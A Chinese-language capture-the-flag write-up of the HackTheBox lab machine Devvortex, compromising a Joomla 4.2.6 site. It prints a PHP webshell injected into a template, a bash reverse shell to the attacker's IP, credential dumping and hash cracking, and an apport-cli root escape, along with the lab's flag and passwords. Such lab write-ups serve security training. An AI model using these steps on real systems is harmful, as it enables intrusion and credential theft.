Devvortex
Devvortex is an easy-difficulty Linux machine that features a Joomla CMS that is vulnerable to information disclosure. Accessing the service’s configuration file reveals plaintext credentials that lead to Administrative access to the Joomla instance. With administrative access, the Joomla template is modified to include malicious PHP code and gain a shell. After gaining a shell and enumerating the database contents, hashed credentials are obtained, which are cracked and lead to SSH access to the machine. Post-exploitation enumeration reveals that the user is allowed to run apport-cli as root, which is leveraged to obtain a root shell.
Recon
对于开放的端口而言 并没有太多值得需要关注的地方 又是网站服务80端口起手
❯ nmap -sCV -p22,80 10.10.11.242
Starting Nmap 7.98 ( https://nmap.org ) at 2025-09-15 23:38 +0800
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds
进入web服务之后 并不能找到合适的攻击点 下方的输入框也没有什么头绪 下一步还是HTB提供的思路去寻找子域名 也是学到了
❯ proxychains ffuf -w subdomains-1000.txt -u http://10.10.11.242 -H 'Host: FUZZ.devvortex.htb'
[proxychains] config file found: /Users/joe/proxychains-ng/proxychains.conf
[proxychains] preloading /Users/joe/proxychains-ng/libproxychains4.dylib
[proxychains] DLL init: proxychains-ng 4.17-git-4-gce07eaa
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.242
:: Wordlist : FUZZ: /Users/joe/Documents/Red/SecDictionary/Subdomain_List/subdomains-1000.txt
:: Header : Host: FUZZ.devvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 601ms]
发现以dev开头的子域名 加入hosts以访问
10.10.11.242 devvortex.htb dev.devvortex.htb
成功访问之后发现页脚里和源代码里都没有写到对应的框架信息(至少我没找到) 遂使用CmsVulScan扫描一下框架信息
❯ python3 CmsVulScan.py -u http://dev.devvortex.htb
_____ _ __ ______
/ ___/_ _ __| | / /_ __/ / __/______ ____
/ /__/ ' \(_-< |/ / // / /\ \/ __/ _ `/ _ \
\___/_/_/_/___/___/\_,_/_/___/\__/\_,_/_//_/
[00:22:07] [*] Check whether the payload file exists
[00:22:07] [*] All Payload 18780 duplicate removal 6935
[00:22:07] [+] Payload load the success
[00:22:07] [*] CMS recognition of http://dev.devvortex.htb in progress
[00:22:07] [*] Scanning by MD5 mode......
[00:24:17] [*] MD5: 3725/3725
[00:24:17] [*] Scanning by RE mode......
[00:24:19] [*] RE: 49/2868
[00:24:19] [+] Using RE to discover the CMS in path /administrator/components/com_login/login.xml: Joomla(逐浪)
确实是Joomla 那么接下来获取版本 直接访问/administrator在页脚也没有看到版本信息 那么去msfconsole看下
msf > search joomla
14 auxiliary/scanner/http/joomla_version
msf > use auxiliary/scanner/http/joomla_version
msf auxiliary(scanner/http/joomla_version) > set rhosts http://dev.devvortex.htb/
rhosts => http://dev.devvortex.htb/
msf auxiliary(scanner/http/joomla_version) > run
[*] Server: nginx/1.18.0 (Ubuntu)
[+] Joomla version: 4.2.6
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
成功获取该joomla版本为4.2.6
Shell as logan
CVE-2023-23752
既然知道了框架 那搜一下关于他的洞 发现没有4.2.6的 但是有个比他高一点的4.2.8 那就试一下好啦
┌──(kali㉿kali)-[~]
└─$ searchsploit joomla | grep 4.2
Joomla! v4.2.8 - Unauthenticated information disclosure | php/webapps/51334.py
┌──(kali㉿kali)-[~]
└─$ searchsploit -x php/webapps/51334.py
#!/usr/bin/env ruby
# Exploit
## Title: Joomla! v4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
发现确实是4.0.0到4.2.8都可以通用的漏洞 那么就用msfconsole着手吧
msf > use cve:2023-23752
msf auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts http://dev.devvortex.htb/
rhosts => http://dev.devvortex.htb/
msf auxiliary(scanner/http/joomla_api_improper_access_checks) > run
[+] Users JSON saved to /Users/joe/.msf4/loot/20250916125947_default_10.10.11.242_joomla.users_856850.bin
[+] Joomla Users
============
ID Super User Name Username Email Send Email Register D Last Visit Group Names
ate Date
-- ---------- ---- -------- ----- ---------- ---------- ----------- -----------
649 * lewis lewis lewis@devv 1 2023-09-25 2023-10-29 Super Users
ortex.htb 16:44:24 16:18:50
650 logan paul logan logan@devv 0 2023-09-26 Registered
ortex.htb 19:15:42
[+] Config JSON saved to /Users/joe/.msf4/loot/20250916125948_default_10.10.11.242_joomla.config_972795.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla
db password P4ntherg0t1n5r3c0n##
db prefix sd4fg_
db user lewis
dbtype mysqli
可以正常打通获取信息 就是不知道为什么下面还是接了一连串的报错 尝试直接连接数据库发现是连不上的 可能没有开启远程连接 好在可以复用为登陆账号密码
Templates修改
进来之后一把梭的CVE应该是再没了 后来也是学习了一下joomla框架 发现System/Templates/Site Templates里面可以编辑框架模版 并且是实时更新的 那么看看能不能给他加点啥
<?php
/**
* @package Joomla.Site
* @subpackage Templates.cassiopeia
*
* @copyright (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
defined('_JEXEC') or die;
if (isset($_REQUEST['hack'])){
system($_REQUEST['hack']);
die();
}
...
对index.php我们因为权限并不能修改 但是发现了error.php这个漏网之鱼 修改之后弹个shell
http://dev.devvortex.htb/hack?hack=bash -c "bash -i >%26 /dev/tcp/10.10.*.*/4444 0>%261"
❯ nc -lvn 4444
bash: cannot set terminal process group (871): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<tb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@devvortex:~/dev.devvortex.htb$
//连接后使用python升级shell
Hashcat
连接之后发现home下只有logan用户 尝试使用之前的lewis/P4ntherg0t1n5r3c0n##用户密码无法ssh连接 后来想起来之前的数据库还没有连接过 尝试使用mysql连接数据库
www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla
<htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla
...
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
ok成功连接上 就不开远程连接了 直接干terminal好了
mysql> describe sd4fg_users;
+---------------+---------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+---------------+------+-----+---------+----------------+
| id | int | NO | PRI | NULL | auto_increment |
| name | varchar(400) | NO | MUL | | |
| username | varchar(150) | NO | UNI | | |
| email | varchar(100) | NO | MUL | | |
| password | varchar(100) | NO | | | |
| block | tinyint | NO | MUL | 0 | |
| sendEmail | tinyint | YES | | 0 | |
| registerDate | datetime | NO | | NULL | |
| lastvisitDate | datetime | YES | | NULL | |
| activation | varchar(100) | NO | | | |
| params | text | NO | | NULL | |
| lastResetTime | datetime | YES | | NULL | |
| resetCount | int | NO | | 0 | |
| otpKey | varchar(1000) | NO | | | |
| otep | varchar(1000) | NO | | | |
| requireReset | tinyint | NO | | 0 | |
| authProvider | varchar(100) | NO | | | |
+---------------+---------------+------+-----+---------+----------------+
17 rows in set (0.01 sec)
mysql> select name,username,password from sd4fg_users;
+------------+----------+--------------------------------------------------------------+
| name | username | password |
+------------+----------+--------------------------------------------------------------+
| lewis | lewis | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan paul | logan | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+------------+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)
这条logan paul的记录比较有意思 应该可以复用于ssh连接了 现在首要是撞出哈希
❯ hashcat logan ../Documents/Red/SecDictionary/PasswordDic/弱口令字典/rockyou-top15000.txt --user -m 3200
···
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho
当然反过来去撞lewis的密码也是可以的
❯ cat sqlpass
P4ntherg0t1n5r3c0n##
❯ hashcat logan sqlpass --user -m 3200
...
$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u:P4ntherg0t1n5r3c0n##
ok那就用logan:tequieromucho进行ssh登陆 成功拿到user.txt
❯ ssh logan@10.10.11.242
...
logan@devvortex:~$ cat /home/logan/user.txt
7255c0f90e316ba7041e99fa4732413c
Shell as root
使用sudo -l之后发现可以用SUID提权 发现可以利用CVE-2023-1326
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
apport为处理崩溃程序 若还没崩溃文件那可以先制造一个
logan@devvortex:/var/crash$ sleep 20 &
[1] 2761
logan@devvortex:/var/crash$ kill -ABRT 2761
logan@devvortex:/var/crash$ ls
_usr_bin_sleep.1000.crash
[1]+ Aborted (core dumped) sleep 20
获得到崩溃文件之后 就可以进行SUID啦
logan@devvortex: sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
press V (view report)
!/bin/bash(直接输入 不用管屏幕显示的什么)